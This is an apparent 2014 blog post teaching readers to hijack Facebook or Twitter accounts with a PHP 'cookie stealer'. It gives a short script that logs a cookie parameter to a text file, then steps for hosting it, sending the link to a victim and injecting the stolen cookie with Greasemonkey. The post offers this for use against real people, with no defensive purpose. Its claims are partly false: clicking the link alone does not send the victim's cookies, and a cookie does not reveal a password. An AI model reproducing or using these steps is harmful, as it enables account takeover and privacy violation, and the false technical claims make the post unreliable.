Pages

Thursday 13 February 2014

Hacking facebook account using php cookie stealer..

Hello Friends i am telling a new and safe way to hack a facebook or twitter account just in a click. The tutorial i will show u today is Cookie Stealing using a php script and then use this cookie to get the username and password.So lets start:--->
1. create a new text file and type this code

<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\n");
fclose($steal);
?>

2. Save it as index.php

3. Now upload this to any free web hosting site .

4. After uploading this file make sure u have set the file permission to 777

5. Now u will get the url as www.ursite.com/index.php

6. Now send this url to ur victim and when victim clicks on this link his cookie will be stored in a text file named as cookiefile.txt

7. Use Mozilla browser,greasmonkey and cookie injector script to inject cookie into facebook and then u have the access to victim account.

0 comments:

Post a Comment